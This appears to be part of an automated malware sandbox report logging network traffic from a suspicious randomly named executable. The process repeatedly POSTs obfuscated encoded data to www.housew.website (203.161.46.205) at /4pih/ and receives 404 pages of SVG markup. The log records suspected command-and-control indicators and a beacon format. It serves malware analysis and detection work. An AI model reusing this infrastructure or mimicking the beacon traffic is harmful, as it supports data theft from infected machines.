                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 55 6b 6e 51 44 55 68 44 4c 6c 5a 32 61 51 32 53 56 76 42 37 46 48 4b 7a 49 71 65 74 64 71 4d 4d 2b 65 66 33 32 77 72 71 6d 43 53 2b 6a 32 6d 6f 4d 35 38 77 36 68 6c 65 68 73 51 4a 41 54 31 64 77 42 55 4f 56 43 67 41 41 32 4b 47 42 37 6c 45 38 42 30 33 62 63 4b 72 6d 2f 48 66 73 38 48 31 45 33 6d 47 79 37 54 6a 32 51 43 39 7a 77 64 4e 69 63 6f 50 7a 58 50 2b 34 5a 6d 44 4e 53 57 33 52 49 6c 31 32 2b 73 41 5a 58 57 61 6a 76 6c 77 6b 74 55 32 79 2f 6d 76 67 4a 51 77 39 6a 47 78 46 46 36 62 2f 39 62 41 33 47 66 31 59 41 30 6f 7a 6c 51 78 69 46 30 2b 66 42 39 2f 41 2f 71 46 43 53 70 5a 69 50 35 54 4f 45 6e 70
                                                                                  Data Ascii: GR54yHZ8=UknQDUhDLlZ2aQ2SVvB7FHKzIqetdqMM+ef32wrqmCS+j2moM58w6hlehsQJAT1dwBUOVCgAA2KGB7lE8B03bcKrm/Hfs8H1E3mGy7Tj2QC9zwdNicoPzXP+4ZmDNSW3RIl12+sAZXWajvlwktU2y/mvgJQw9jGxFF6b/9bA3Gf1YA0ozlQxiF0+fB9/A/qFCSpZiP5TOEnp
                                                                                  Nov 20, 2024 08:33:39.962527037 CET1236INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 20 Nov 2024 07:33:39 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 16052
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                                  Nov 20, 2024 08:33:39.962563992 CET1236INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                                                  Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="disp
                                                                                  Nov 20, 2024 08:33:39.962591887 CET448INData Raw: 38 2e 38 35 38 37 31 35 20 2d 30 2e 36 30 32 31 37 35 2c 2d 33 31 2e 34 36 39 32 32 38 20 2d 30 2e 30 31 32 35 33 2c 2d 32 32 2e 37 35 39 35 36 35 20 30 2e 37 31 37 32 36 32 2c 2d 34 31 2e 32 33 31 34 35 32 31 33 20 31 2e 36 32 38 39 39 35 2c 2d
                                                                                  Data Ascii: 8.858715 -0.602175,-31.469228 -0.01253,-22.759565 0.717262,-41.23145213 1.628995,-41.23195399 z" style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;"
                                                                                  Nov 20, 2024 08:33:39.962606907 CET1236INData Raw: 36 38 31 31 33 20 2d 31 2e 33 35 35 38 35 33 2c 31 2e 35 30 33 31 32 20 2d 32 2e 34 37 33 37 36 34 2c 33 2e 30 39 31 37 33 20 2d 33 2e 33 38 37 38 36 36 2c 34 2e 35 39 35 33 38 20 2d 30 2e 39 31 34 31 30 33 2c 31 2e 35 30 33 36 35 20 2d 31 2e 36
                                                                                  Data Ascii: 68113 -1.355853,1.50312 -2.473764,3.09173 -3.387866,4.59538 -0.914103,1.50365 -1.620209,2.91586 -2.416229,4.41952 -0.79602,1.50365 -1.67928,3.09352 -0.808656,3.24054 0.870624,0.14702 3.490408,-1.14815 5.700074,-1.91396 2.209666,-0.76581 4.0014
                                                                                  Nov 20, 2024 08:33:39.962624073 CET1236INData Raw: 34 39 36 35 35 2c 31 33 2e 36 36 36 30 35 20 2d 31 33 2e 39 31 36 36 30 38 2c 31 38 2e 37 34 39 36 20 2d 33 2e 31 36 36 39 35 32 2c 35 2e 30 38 33 35 35 20 2d 34 2e 33 33 33 34 33 32 2c 38 2e 32 34 39 37 31 20 2d 34 2e 37 35 30 33 31 35 2c 31 31
                                                                                  Data Ascii: 49655,13.66605 -13.916608,18.7496 -3.166952,5.08355 -4.333432,8.24971 -4.750315,11.08369 -0.416883,2.83399 -0.08368,5.33304 1.809372,16.25302 1.893048,10.91998 5.343489,30.24673 9.760132,48.66349 4.416642,18.41676 9.798356,35.91675 15.180267,5
                                                                                  Nov 20, 2024 08:33:39.962639093 CET1236INData Raw: 37 38 36 2c 36 2e 32 32 39 31 32 20 31 31 2e 36 39 37 38 39 2c 31 32 2e 32 32 39 31 34 20 31 37 2e 31 31 34 35 36 2c 31 38 2e 33 39 35 38 31 20 35 2e 34 31 36 36 36 2c 36 2e 31 36 36 36 37 20 31 30 2e 37 34 39 39 36 2c 31 32 2e 34 39 39 39 35 20
                                                                                  Data Ascii: 786,6.22912 11.69789,12.22914 17.11456,18.39581 5.41666,6.16667 10.74996,12.49995 14.74993,17.91655 3.99997,5.41659 6.66659,9.91653 7.16671,17.83316 0.50012,7.91664 -1.16644,19.24921 -3.3502,31.24619 -2.18376,11.99698 -4.81616,24.33632 -8.4206
                                                                                  Nov 20, 2024 08:33:39.962657928 CET1236INData Raw: 33 2c 32 33 2e 38 30 36 34 37 20 2d 30 2e 35 33 30 33 34 2c 31 34 2e 31 34 33 33 38 20 2d 32 2e 38 38 37 30 36 2c 33 36 2e 35 33 32 32 36 20 2d 35 2e 34 32 30 39 2c 35 36 2e 34 34 39 35 31 20 2d 32 2e 35 33 33 38 33 2c 31 39 2e 39 31 37 32 35 20
                                                                                  Data Ascii: 3,23.80647 -0.53034,14.14338 -2.88706,36.53226 -5.4209,56.44951 -2.53383,19.91725 -5.24428,37.35836 -7.95503,54.80146" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;strok
                                                                                  Nov 20, 2024 08:33:39.962768078 CET896INData Raw: 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22
                                                                                  Data Ascii: butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4545" d="m 83.12978,122.92016 c -2.601311,10.56131 -5.214983,21.17282 -7.40283,31.41665 -2.187847,10.24384 -3.955407,20.14218 -5.074975,26.03483
                                                                                  Nov 20, 2024 08:33:39.962836027 CET1236INData Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74
                                                                                  Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
                                                                                  Nov 20, 2024 08:33:39.962872028 CET1236INData Raw: 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65
                                                                                  Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5"
                                                                                  Nov 20, 2024 08:33:39.967689991 CET1236INData Raw: 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31
                                                                                  Data Ascii: one;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.038164)" id="path4567" d="m 321.74355,168.0687 c -1e-5,3.3913 -3.42414,11.26702 -8.73834,11.26702 -5.3142,0 -18.59463,27.24606


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  30192.168.2.650019203.161.46.205803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:33:41.948102951 CET840OUTPOST /4pih/ HTTP/1.1
                                                                                  Host: www.housew.website
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 237
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.housew.website
                                                                                  Referer: http://www.housew.website/4pih/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 55 6b 6e 51 44 55 68 44 4c 6c 5a 32 62 7a 2b 53 57 4d 70 37 43 6e 4b 30 57 36 65 74 47 36 4d 32 2b 65 44 33 32 78 2f 45 6d 78 32 2b 6a 53 69 6f 65 6f 38 77 39 68 6c 65 35 38 51 4d 64 6a 31 53 77 42 59 6f 56 44 63 41 41 32 75 47 42 36 56 45 38 57 41 6f 64 4d 4b 6c 79 50 47 35 78 73 48 31 45 33 6d 47 79 37 48 4a 32 51 61 39 30 41 4e 4e 6a 35 63 4d 77 58 50 2f 39 5a 6d 44 63 69 57 7a 52 49 6c 58 32 38 59 71 5a 52 4b 61 6a 72 31 77 6b 63 55 31 72 50 6e 71 74 70 52 39 39 53 79 35 4b 54 72 45 38 4f 72 59 6d 31 76 31 64 32 70 79 76 57 51 53 77 56 55 38 66 44 6c 4e 41 66 71 76 41 53 52 5a 77 59 31 30 42 77 43 4b 39 68 42 5a 68 31 35 30 48 2f 69 79 6c 51 4a 39 5a 70 47 33 4e 77 3d 3d
                                                                                  Data Ascii: GR54yHZ8=UknQDUhDLlZ2bz+SWMp7CnK0W6etG6M2+eD32x/Emx2+jSioeo8w9hle58QMdj1SwBYoVDcAA2uGB6VE8WAodMKlyPG5xsH1E3mGy7HJ2Qa90ANNj5cMwXP/9ZmDciWzRIlX28YqZRKajr1wkcU1rPnqtpR99Sy5KTrE8OrYm1v1d2pyvWQSwVU8fDlNAfqvASRZwY10BwCK9hBZh150H/iylQJ9ZpG3Nw==
                                                                                  Nov 20, 2024 08:33:42.565973043 CET1236INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 20 Nov 2024 07:33:42 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 16052
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                                                  Nov 20, 2024 08:33:42.566024065 CET224INData Raw: 3e 0a 20 20 20 20 3c 2f 64 65 66 73 3e 0a 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 37 30 2e 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c
                                                                                  Data Ascii: > </defs> <g transform="translate(170.14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)"
                                                                                  Nov 20, 2024 08:33:42.566082954 CET1236INData Raw: 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69
                                                                                  Data Ascii: style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000;stroke-width:0.1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" d="m 145.0586,263.51309 c -90.20375,-0.0994 -119.20375,-0.0994 -119.20375,-0.09
                                                                                  Nov 20, 2024 08:33:42.566119909 CET1236INData Raw: 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 34 39 36 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22
                                                                                  Data Ascii: ;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.0036,3.37532 -0.0071,6.75165 -0.0107,10.12897 m 0.512159,0.18258 c -1.914603,-0.23621 -3.505591,1.17801 -4.861444,2.68113 -1.355853,1.5
                                                                                  Nov 20, 2024 08:33:42.566153049 CET1236INData Raw: 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 31 33 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 37 34 2e 36 38 37 35 2c 31 32 35 2e 30 33 37
                                                                                  Data Ascii: ;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -13.197555,13.3433 -18.781379,20.01048 -5.583823,6.66719 -10.749655,13.66605 -13.
                                                                                  Nov 20, 2024 08:33:42.566186905 CET672INData Raw: 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a
                                                                                  Data Ascii: #000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.14581 6.19786,6.22912 11.6978
                                                                                  Nov 20, 2024 08:33:42.566220999 CET1236INData Raw: 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 35 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 6d 20 39 31 2e 39 33 37 35 2c 31 32 34 2e 30 39 39 39 38 20
                                                                                  Data Ascii: /> <path id="path4525" d="m 91.9375,124.09998 c 5.854072,7.16655 11.70824,14.33322 16.21863,20.16651 4.51039,5.83328 7.67706,10.33329 11.92718,16.33346 4.25012,6.00017 9.58322,13.49984 12.66653,18.58299 3.08
                                                                                  Nov 20, 2024 08:33:42.566277027 CET1236INData Raw: 39 34 33 35 31 37 2c 34 2e 31 32 37 39 35 20 32 2e 38 32 37 35 33 35 2c 31 31 2e 31 39 33 30 32 20 34 2e 30 36 35 30 30 35 2c 31 36 2e 30 32 35 30 31 20 31 2e 32 33 37 34 38 2c 34 2e 38 33 32 20 31 2e 38 32 36 36 38 2c 37 2e 34 32 34 34 37 20 32
                                                                                  Data Ascii: 943517,4.12795 2.827535,11.19302 4.065005,16.02501 1.23748,4.832 1.82668,7.42447 2.12139,10.84263 0.29471,3.41815 0.29471,7.65958 -0.11785,20.44893 -0.41255,12.78934 -1.23731,34.11536 -2.18014,53.62015 -0.94282,19.50478 -2.003429,37.18159 -3.0
                                                                                  Nov 20, 2024 08:33:42.566308975 CET448INData Raw: 35 34 2e 32 30 37 36 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                                                  Data Ascii: 54.20767" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4549" d="m 79.25478,124.23266 c -5.440192,
                                                                                  Nov 20, 2024 08:33:42.566399097 CET1236INData Raw: 39 35 2c 35 33 2e 38 34 37 34 36 20 32 2e 32 33 37 39 31 33 2c 31 39 2e 33 37 38 32 39 20 34 2e 38 33 33 31 30 39 2c 33 36 2e 37 31 38 39 32 20 37 2e 34 32 35 39 35 39 2c 35 34 2e 30 34 33 38 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74
                                                                                  Data Ascii: 95,53.84746 2.237913,19.37829 4.833109,36.71892 7.425959,54.04387" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="pa
                                                                                  Nov 20, 2024 08:33:42.566438913 CET1236INData Raw: 34 35 38 30 36 2c 33 36 2e 38 33 32 31 36 20 2d 31 32 2e 36 38 37 35 2c 35 35 2e 32 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65
                                                                                  Data Ascii: 45806,36.83216 -12.6875,55.25" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <ellipse ry="4.6715717" rx="2.5"


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  31192.168.2.650020203.161.46.205803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:33:44.501368046 CET1853OUTPOST /4pih/ HTTP/1.1
                                                                                  Host: www.housew.website
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 1249
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.housew.website
                                                                                  Referer: http://www.housew.website/4pih/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 55 6b 6e 51 44 55 68 44 4c 6c 5a 32 62 7a 2b 53 57 4d 70 37 43 6e 4b 30 57 36 65 74 47 36 4d 32 2b 65 44 33 32 78 2f 45 6d 78 2b 2b 6a 68 71 6f 4d 62 6b 77 38 68 6c 65 6e 73 51 4e 64 6a 31 31 77 46 30 6b 56 44 51 51 41 30 47 47 54 6f 74 45 74 79 63 6f 55 4d 4b 6c 77 50 48 65 73 38 48 67 45 33 32 43 79 37 58 4a 32 51 61 39 30 43 6c 4e 67 73 6f 4d 39 33 50 2b 34 5a 6d 6d 4e 53 57 62 52 49 38 31 32 38 4d 51 5a 6e 36 61 6a 4b 5a 77 6a 2b 73 31 30 2f 6e 6b 73 70 51 75 39 53 76 6e 4b 58 7a 49 38 4f 76 6d 6d 32 7a 31 66 67 67 6b 33 56 35 4d 69 6a 41 7a 44 7a 56 52 50 59 69 68 4a 67 4e 5a 37 62 4e 6f 43 42 79 2b 37 52 64 54 30 53 51 55 47 73 58 59 75 58 49 50 63 35 58 74 65 75 35 6e 69 4d 63 63 2b 42 45 44 79 54 55 4b 6c 52 73 34 75 38 77 34 30 78 39 78 66 66 41 6e 38 2b 7a 46 4d 43 43 38 4a 46 61 6a 78 73 41 4b 69 68 57 78 66 4b 50 5a 62 30 75 55 61 41 2b 4d 6d 2b 66 66 6e 59 77 70 4d 72 34 49 6a 70 6d 74 44 56 54 30 73 2f 63 4a 37 4f 54 4e 57 54 71 42 6f 55 78 71 62 6e 78 38 6f [TRUNCATED]
                                                                                  Data Ascii: GR54yHZ8=UknQDUhDLlZ2bz+SWMp7CnK0W6etG6M2+eD32x/Emx++jhqoMbkw8hlensQNdj11wF0kVDQQA0GGTotEtycoUMKlwPHes8HgE32Cy7XJ2Qa90ClNgsoM93P+4ZmmNSWbRI8128MQZn6ajKZwj+s10/nkspQu9SvnKXzI8Ovmm2z1fggk3V5MijAzDzVRPYihJgNZ7bNoCBy+7RdT0SQUGsXYuXIPc5Xteu5niMcc+BEDyTUKlRs4u8w40x9xffAn8+zFMCC8JFajxsAKihWxfKPZb0uUaA+Mm+ffnYwpMr4IjpmtDVT0s/cJ7OTNWTqBoUxqbnx8ofgb0OQM12lfCoCuRB8zUR6rR6c5bza9QvxoPoNjyZ9BwTWXUCfM3cVXf+FT9Fb+jzqBdlGLClCXaus/xyGnxBLqt+tFjCZWcPPw14rPvnh9vdmnG56+dBoOLWdfeDK5Ne8XGIH0rTLJifpAjiuaRxpAj0Y45lQou6WY7DWa5jB9KtDW0fhNr0NsH7w53VlmagcIBwg90pj6gwCksZVlE/k6gIqo9MvlR2ts3OzRYtl+FK0uqPRDCYjxslmJ4efAmsFdndpsNIARrEYAh3nWZg+U5ZOSruwDpptslJM8nU+W5YjmzhuWRZBciSZkhVWiSAHBFkNBC2/QH7dbWeCJD1UoT6YWRVe2EJWjKvTSm1z63UbkdPxnS45DNWwKFwxoHErxJ4qvlicLzzFAyJOqBvFb9RfpxzTCzx9LL2GP1y0nMQZ5/knSzRIIQe7S+jUASMggyTgUD117/TYNNVd4IdDxXLxpfp3FbmZKbVEHJSFx/c85vXuxYWKo/XQ7DREJvBkiwNctJzB5NcdrGnOZ4lpGfZZ1c8n35fHs+ksBwko313hbpsfgdhsPzaLEhL6U7pT4FzmlUD6hpUOUESTCRjfYfTtF9azSpHONm257a+YST3rzxJfhcgF7YILb+xYZ2EDC0nRaU74LLaohuunNCrNhoZtSyuHUhMv [TRUNCATED]
                                                                                  Nov 20, 2024 08:33:45.061866999 CET1236INHTTP/1.1 404 Not Found
                                                                                  Date: Wed, 20 Nov 2024 07:33:44 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 16052
                                                                                  Connection: close
                                                                                  Content-Type: text/html
